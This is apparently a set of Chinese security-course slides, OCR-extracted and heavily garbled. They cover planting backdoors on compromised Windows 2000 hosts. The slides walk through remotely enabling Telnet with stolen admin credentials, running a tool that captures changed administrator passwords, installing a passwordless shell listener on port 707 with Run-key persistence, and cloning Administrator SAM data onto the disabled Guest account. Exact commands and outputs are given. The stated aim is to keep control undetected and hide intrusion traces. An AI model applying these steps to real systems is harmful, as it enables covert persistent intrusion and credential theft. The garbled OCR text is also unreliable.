【IT计算机】网络后门与网络隐身

第六章网络后门与网络隐身

本章目标

•为了保持对已经入侵的主机长久的控制，需要在

主机上建立网络后门，以后可以直接通过后门入

侵系统。

•当入侵主机以后，通常入侵者的信息就被记录在

主机的日志中，比如IP地址、入侵的时间以及做

了哪些破坏活动等等

•为了入侵的痕迹被发现，需要隐藏或者清除入侵

的痕迹

•实现隐身有两种方法：

-设置代理跳板

-清除系统日志。

.弋l厂e八1।一*.、一》I一./.Ar7AR~t

cmjo白片-”r--卜.门「一i-*dIKxloDepartment,QiJd

网络后门

•网络后门是保持对目标主机长久控制的关键策

略。

•可以通过建立服务端口和克隆管理员帐号来实

现。

•留后门的艺术

•只要能不通过正常登录进入系统的途径都称之为网

络后I］。

•后门的好坏取决于被管理员发现的概率。

•只要是不容易被发现的后门都是好后门。留后门的

原理和选间谍一样：让管理员看了感觉没有任何特

别的。

.弋l厂e八1।一*.、一》I一./.Ar7AR~t

cmjo白片-”r--卜.门「一i-*dIKxloDepartment,QiJd

案例6-1远程启动Telnet服务

•利用主机上的Telnet服务，有管理员密码就可以

登录到对方的命令行，进而操作对方的文件系

统。如果Telnet服务是关闭的，就不能登录了。

•默认情况下，Windows2000Server的Telnet是

关闭白勺，可以在运行窗口中输入tlntadmn.exe命

令启动本地Telnet服务，如图6・1所示。

.弋l厂e八1।一*.、一》I一./.Ar7AR~t

cmjo白片-”r--卜.门「一i-*dIKxloDepartment,QiJd

启动本地Telnet服务

•在启动的DOS窗口中输入4就可以启动本地

Telnet服务了,

区C:\WINNT\System32\tlntadmn.exe.!□1x

ft<R>Windows2000<TM><内部版本号2195)

ServerAdmin<Build5.00.99201.!>

请在下列选项中选择一个:

出

个

应

退

这

程

序

告

当

出

列

前

用

一

鞭

1)束

结

盘

个

整

a一

2>示

显

/置

务

3)始

服

开

务

止

4>服

停

请键入一个选项的号码［0-5］以选择该选项：4

二J

AtAr、.厂E八1।一*.、-rI_»rv^葭I17ArR~t

口口片…T、r-LC,UI网oDepartment,QiJd

远程开启对方的Telnet服务

•利用工具RTCS.vbe可以远程开启对方的Telnet服

务，使用该工具需要知道对方具有管理员权限的用

户名和密码。

•命令的语法是：“cscriptRTCS.vbe

09administrator123456123”，

•其中cscript是操作系统自带的命令

・RTCS.vbe是该工具软件脚本文件

・I训址是要启动Telnet的主机地址

・administrator是用户名

・123456是密码

・1是登录系统的验证方式

・23是Telnet开放的端口

•该命令根据网络的速度，执行的时候需要一段时

间，开启远程主机Telnet服务的过程如下图所示。

人自、.rm八I।一,*tI_.rmJivtHoDepartment,QiJd

-ion1.1otb'ti**I*-一Lcru*4Ifxxl

远程开启对方的Telnet服务

,1□1x|

C：\RTCS>cscriptRTCS.ube09administrator123456123

Microsoft(R)WindowsScriptHostUersion5.6

(C)MicrosoftCorporation1996-2Q01□保留所有权利□

**x***x***x*******x*******x*******x*************x*x*******x****x**x**xx*

RTCSU1.08

RemoteTelnetConfigureScript,byzzzeuazzz

blelcometouisite

Usage：

cscriptC:\RTCS\RTCS.ubetargetIPusernamepasswordNTLMAuthortelnetport

Itwillautochangestateoftargettelnetseruer.

XXMXMMMMXXXXXXMMMMXMMMMMMMXXXMMMMMMMXMMXMXMMMMXMXXMMXMXXXXMMMMMMXXMXMMMX

Conneting09....

OK?

SettingNTLM=1....

0K»

Settingport=23....

OK?

Queryingstateoftelnetseruer....

Changeingstate....

0K»

TargettelnetseruerhasbeenSTARTSuccessfully?

Now,youcantry：telnet0923,togetashell.

C：\RTCS>

AtAr、.IE/.I.、一tI~177rr^-t

0Q,fl*'Iikrt^F_r4L.Lt・-iLcrGI1x510Department,QiJd

确认对话框

•执行完成后，对方的Telnet服务就被开启了。在DOS提示符

下，登录目标主机的Telnet服务，首先输入命令"Telnet

09,5,因为Telnet的用户名和密码是明文传递

的，首先出现确认发送信息对话框，如图所示。

F'C:\WINfMT\System32\cmd.exe-telnet172.1825.109-in]x

Microsoft(R)Windows2000(TM)版本5,GO(内部版本号2195)上

欢迎使用MicrosoftTelnetClient

TelnetClient内部版本号5.GO.99203.1

Escape字符为'CTRL+],

您将要发送密码信息到Internet区域中的远程计算机。这可能不安全。是否还要发送(y/n)：y

zJ

±1/

A"、.弋l厂e/.Ii一*.、一》I一./.Ar7AR~t

cmjo白片-”r--卜.门「一i-*dIKxloDepartment,QiJd

登录Telnet的用户1名和密码

■输入字符“『'，进入Telnet的登录界面，需

要输入主机的用户名和密码，如图所示。

-|g|x

NTLMAuthenticationfailedduetoinsufficientcredentials.Pleaseloginwith

cleartextusernameandpassword

Microsoft(R)Windows(TM)Uersion5.00(Build2195)

WelcometoMicrosoftTelnetSeruice

TelnetSeruerBuild5.00.99201.1

login：administrator

password：

A"、.er/.II_»74r7Ar^-t

cmjo白片-”r--卜.门「一i-*dIKxloDepartment,QiJd

登录Telnet服务器

■如果用户名和密码没有错误，将进入对方

主机的命令行，如图所示。

A"、.E

卜Zlrrt1*-L,mrCTIUJI''oDepartment,QiJd

记录管理员口令修改过程

•当入侵到对方主机并得到管理员口令以后，

就可以对主机进行长久入侵了，但是一个好

的管理员一般每隔半个月左右就会修改一次

密码，这样已经得到的密码就不起作用了。

•利用工具软件Win2kPass.exe记录修改的

新密码，该软件将密码记录在Winnt\temp

目录下的Config.ini文件中，有时候文件名

可能不是Config,但是扩展名一定是ini,该

工具软件是有“自杀”的功能，就是当执行完

毕后，自动删除自己。

.弋l厂e八1।一*.、一》I一./.Ar7AR~t

cmjo白片-”r--卜.门「一i-*dIKxloDepartment,QiJd

记录管理员口令修改过程

•首先在对方操作系统中执行Win2KPass.exe文

件，当对方主机管理员密码修改并重启计算机以

后，就在Winnt\temp目录下产生一个ini文件，

如图所示。

C:\WINNT\Temp

L文件（日编辑©查看⑦收藏（Q工具（D帮助3

i*后适▼吟▼山।a搜索।岛外快一。房史।西哈冥份|

［理毗切口C：MINNT\T薪；三］口转到

文件夹：D

®口DriverCache

口Fonts.ISTMP1,DIR

®口HelpTemp

[']IISTemporaryCc

SOjava

Config.ini

「IMedia配置要置

S口msagent

SC]msapps修改时间：2003-11-

@口mww32.

大小：111字节

E回OfflineWebPage

QjRegistration属性:（正常）

口repair

田＜pnirihw，二

“I2J

类型:配置设置大小：111手节

案例6-3建立Web服务和Telnet服务

•使用工具软件wnc.exe可以在对方的主机上

开启两个服务：Web服务和Telnet服务。其

中Web服务的端口是808,Telnet服务的端

口是707。执行很简单，只要在对方的命令

行下执行一下wnc.exe就可以，如图所示。

.弋l厂e八1।一*.、一》I一./.Ar7AR~t

cmjo白片-”r--卜.门「一i-*dIKxloDepartment,QiJd

建立Web服务和Telnet服务

执行完毕后，利用命令"netstat・an”来查

看开启的808和707端口，如图所示。

因选定C:\WINNT\System32\cmd.exe-1□1x|

C：\wnc>netstat-an

ActiveConnections

J

ProtoLocalAddressForeignAddressState

TCP0.0.0.0210.0.0.00LISTENING

TCP0.0.0.0250.0.0.00LISTENING

TCP0.0.0.0420.0.0.00LISTENING

TCP0.0.0.0530.0.0.00LISTENING

TCP0.0.0.0800.0.0.00LISTENING

TCP0.0.0.01190.0.e.d0LISTENING

TCP0.0.0.01350.0.0.00LISTENING

TCP0.0.0.04430.0.0.00LISTENING

TCP0.0.0.04450.0.0.00LISTENING

TCP0.0.0.05630.0.0.00LISTENING

TCP0.0.0.0：：707:0LISTENING

TCP0.0.0.0：：808加XKMLISTENING

TCP0.0.0.0：10250.0.0.0:0LISTENING

TCP0.0.0.0：10260.0.0.0:0LISTENING

TCP0.0.0.0：10290.0.0.0:0LISTENING

TCP0.0.0.0：10300.0.0.0:0LISTENING二J

测试Web服务

•说明服务端口开启成功，可以连接该目标主机提供的这两

个服务了。首先测试Web服务808端口，在浏览器地址栏

中输入72J8.25.109:808”，出现主机的盘符列

表，如图所示。

,mjo白片-”r--卜.门「一i-*dIKxl

看密码修改记录文件

•可以下载对方硬盘设置光盘上的任意文件（对于

汉字文件名的文件下载有问题），可以到

Winnt/temp目录下查看对方密码修改记录文件,

如图所示。

,mjo口片-”r--卜.门「一lc八二dIKxl

利用telnet命令连接707端口

•可以利用“telnet09707”命令登

录到对方的命令行，执行的方法如图所示。

.弋l厂e八1।一*.、一》I一.rr-^/.Ar7AR~t

cmjo白片-”r--卜.门「一i-*dIKxloDepartment,QiJd

登录到对方的命令行

­不用任何的用户名和密码就可以登录对对

方主机的命令行，如图所示。

,1□!x

MicrosoftWindows2000[Uersion5.00.2195]

(C1985-1998MicrosoftCorp.

C：\wnc>ipconfig

Windows2000IPConfiguration

Ethernetadapter本地连接：

Connection-specificDNSSuffix

IPAddress09

SubnetMask

DefaultGateway

C：\wnc>

A"、.er/.ItI_-177r

cmjoa片-"r--卜.门「一i-*dIKxloDepartment,QiJd

自启动程序

•通过707端口也可以方便的获得对方的管理

员权限。

•wncexe的功能强大，但是该程序不能自动

加载执行，需要将该文件加到自启动程序列

表中。

•一般将wnc.exe文件放到对方的winnt目录

或者winnt/system32目下，这两个目录是

系统环境目录，执行这两个目录下的文件不

需要给出具体的路径。

.弋l厂e八1।一*.、一》I一./.Ar7AR~t

cmjo白片-”r--卜.门「一i-*dIKxloDepartment,QiJd

将wncexe力口至U自启动歹U表

•首先将wncwxe和regwxe文件拷贝对方的winnt目录下，

利用regwxe文件将wncwxe加载到注册表的自启动项目

中，命令的格式为：

•fifireg.exeadd

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio

n\Run/vservice/dwncwxe”执行过程如图所示。

BC:\WINNT\System32\cmd.exe

2

C：\>reg.exeaddHKLMXSOFTWAREMIicrosoft\Windows\CurrentUersionXRunZuserviceZd-1

wnc.exe

操作成功结束

c：\>.

d

cmjo白片-”r--卜.门「一i-*dIKxl

修改后的注册表

•如果可以进入对方主机的图形界面，可以

查看一下对方的注册表的自启动项，已经

被修改，如图所示。

案例6-4让禁用的Guest具有管理权限

•操作系统所有的用户信息都保存在注册表

中，但是如果直接使用“regedit”命令打开

注册表，该键值是隐藏的，如图所示。

,mjo白片-”r--卜.门「一i-*dIKxl

查看winlogon.exe的进程号

•可以利用工具软件psu.exe得到该键值的查看和

编辑权。将psu.exe拷贝对方主机的C盘下，并在

任务管理器查看对方主机winlogon.exe进程的ID

号或者使用pulist.exe文件查看该进程的ID号，

如图Hlzj、。口Windows任务管理器injjcj

文件(£)选项⑼查看M帮助M)

应用程序进程|性能|

映像名称1PIDCPUICPU时间|内存使用I.

SystemIdleP...0991:07:3316K

System8000：00：53272K

smss.exe168000:00:05360K

winlogon.exe192000:00：orr2,000K

csrss.exe196000:00:29708K

services,exe248000:00:075,092K

Isass.exe260000:00:034,824K

svchost.exe300000:00:002,484K

svchost.exe432000:00:002,364K

spoolsv.exe460000:00:003,112K

conime.exe492000:00:00948K

msdtc.exe500000:00:003,360K

tcpsvcs.exe620000:00:014,056K

svchost.exe636000:00:014,332K

llssrv.exe668000:00:011,876K

regsvc.exe712000:00:00884K

termsrv.exe716000:00:002,796K

MSTask.exe724000:00:001,944K

nnnnn-nnin/invzl

厂显示所有用户的进程⑤)结束进程四)

,mjo白片-”r--卜.门「一i-*dIKxl

执行命令

•该进程号为192,下面执行命令"psu・p

regedit-ipicT其中pid为Winlogon.exe的

进程号，如图所示。

^Jc：\WINNT\System32\cmd.exe

C：\>psu-ppegedit-i192.

112b

A"、.弋l厂e/.Ii一*.、一》I一.rr-^/.Ar7AR~t

cmjo।卜.门「一i-*dIKxloDepartment,QiJd

查看SAM键值

•在执行该命令的时候必须将注册表关闭，

执行完命令以后，自动打开了注册表编辑

器，查看SAM下的键值，如图所示。

,mjo白片-”r--卜.门「一i-*dIKxl

查看帐户对应的键值

•查看Administrator和guest默认的键值，在

Windows2000操作系统上，Administrator一般

为0x1f4,guest一般为0x1f5,如图所示。

原注册表编辑器

注册表（£）编辑（日查看（玲收藏（E）帮助（LD

S-nHKEY_LOCAL_MACHINE^1名称'类型____________1数据

0OHARCWARE励（默认）0xlf4（长度为零的二进位值）

BLJsAM

BCJsAM

E3CIDomains

E3C-JAccount

E)C-JAliases

由LlGroups

BL_]Users

I000001F4

fl000001F5

Cl000003E8

口000003E9

Ll000003EA

Cl000003EF

r-Cj000003F0―

r~l000003F1

；1000003F2

Cl000003F3

■1000003F4

1000003F5

1-1000003F6

BLJNames

<IAdmin

11Guest▼I|<|1>1

-r*.«-J

cmjo白片-”r--卜.门「一i-*dIKxl

帐户配置信息

•根据"0x1f4”和“0x1f5”找到Administrator

和guest帐户的配置信息，血图所示。

拷贝管理员配置信息

•在图右边栏目中的F键值中保存了帐户的密码信

息，双击“000001F4”目录下键值“F”，可以看到

该键值的二进制信息，将这些二进制信息全选，

并拷贝到出来，如图所示。

'*附田京i八LAIAAAZ-l-iTRICAUAUAAA，C™Ac-I，—》一*CCCCCICA

cmjo白片-”r--卜.门「一i-*dIKxl

覆盖Guest用户的配置信息

•将拷贝出来的信息全部覆盖到“000001F5”

目录下的“。键值中，如图所示。

图注通表奖辑思.!□1x|

编辑二进制数值

注表®编错电互手3X

□_|HKEY_LOCAL_M,数值名称加I：数据_____________________________

[+-_1HARDWARE（数值未设置）

日CJ5AM

数值数据包）:020001000000000000000000C

日口SAM

oo00O2OOO1OOOOOOOO0O000000009c000000020001009

EnDomoo08OOOOOOOOOOOOOO0O

HdIoo10OOOOOOOOOOOOOO0O

oo18OOOOOOOOOOOOOO0O

SIoo20FFFFFFFFFFFFFF7F

SLoo289486BEFO79BOC301

自Loo30F5O1OOOOO1O2OO0O剪切①

oo3815O2OOOOOOOOOO0O复制（0

oo401AOOOOOOOOOOOO0O

oo48OOOOOOOOOOOOOO0O粘贴（E）

删除（8

0050

全选⑷

确定取消|

；J0UUUD3FI""­♦「"121

^0O^te\HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\OOOOOlF5/

/rA-、.rr^t八I।—*.、一》I>rr^t八Irtf-rrt-t■i

「C/1。口片»kzir仆『-ILSLCL,LC,dI"*fx>.IoDepartment,QiJd

保存键值

•Guest帐户已经具有管理员权限了。为了能够使Guest帐户

在禁用的状态登录，下一步将Guest帐户信息导出注册表。

选择User目录，然后选择菜单栏“注册表”下的菜单项“导出

注册表文件”，将该键值保存为一个配置文件，如图所示。

,mjo白片-”r--卜.门「一i-*dIKxl

删除Guest帐户信息

•打开计算机管理对话框，并分别删除Guest

和“00001F5”两个目录，如图所示。

。’注册表编辑器

注册表®编雕查看①收藏6注雌）

S□Aliases:装.

默

S□GroupsREG_5Z

:

HUUsersREG.BINAR^

I000001F4/

REG_BINAR\

=003o0o|o0o0o

OOOOO

ooooo

ooooo

ooooo

OOOOO

00000：复制项名称©

000003T3

000003F411

我的电脑IHKEYLOCALMACHINE\SAM\5AM\Domains^ccounttUser$\000001F5

OCl'fl-"l^fk—HL.LICLeerb-4IfXXI

刷新用户列表

•这个刷新对方主机的用户列表，会出现用

户找不到的对话框，如图所示。

cmjo।卜.门「一lc八、dIKxl

修改Guest帐户的属性

•然后再将刚才导出的信息文件，再导入注册表。再刷新用

户列表就不在出现该对话框了。

■下面在对方主机的命令行下修改Guest的用户属性，注

意：一定要在命令行下。

•首先修改Guest帐户的密码，比如这里改成“123456”，并

将Guest帐户开启和停止，如图所示。

WlC:\WINNT\System32\cmd.exe

C：\>netuserguest123456

命令成功完成。

C：\>netuserguestZactiue：yes

命令成功完成。

C：\>netuserguest/actiue：no

命令成功完成。

C2.

cmjo白片-”r--卜.门「一i-*dIKxl

查看guest帐方属性

•再查看一下计算机管理窗口中的Guest帐

户，发现该帐户使禁用的，如图所示。

乌计菖机管理,!□1x|

操作（④查看也）仁•|国画Ix富晶基

树|名称1全名描述

爱Admin

叁计算机管理（本地）

E簸系统工具^Administrator管理计篁机（域）的内置帐户

出塞|］事件查看器IE编uest供来宾访问计算机或访问域的内.

电典系统信息IEHacker

S艇性能日志和警报

Hacker123

由u共享文件夹堂hax

设备管理器fHHHH

4HHHH

S®本地用户和组

色lAMHackerlAMHacker

tJ用户■£IUSR_ADSER...Internet来宾帐号匿名访问Internet信息服务的内,,

口组

£IWAM_ADSE...启动IIS进程帐号启动进程之外的应用程序的Inter,

E为存储国

qinglOqinglO

□磁盘管理

堂szgszg

好磁盘碎片整理程序

£TsInternetUser

TsInternetUser这个用户帐户被终端服务所使用。

日逻辑驱动器

卬闻可移动存储zJ__________I±1

利用禁用的guest帐户登录

・注销退出系统，然后用用户名：“guest”,

密码：“123456”登录系统，如图所示。

"Windkyws2ooo

穗基一，'IAdvancedServer

用尸名(V):Iguest

密码化):|******

选项©)

cmjo白片-”r--卜.门「一lc八、dIKxl

连接终端服务的软件

•终端服务是Windows操作系统自带的，可以远程通过图

形界面操纵服务器。在默认的情况下终端服务的端口号是

3389o可以在系统服务中查看终端服务是否启动，如图

所示。

噎展务

操作查看⑦|1■»|蠹画|囱'国隰|醇|>■H->______________

树II名称/I描述I状态I启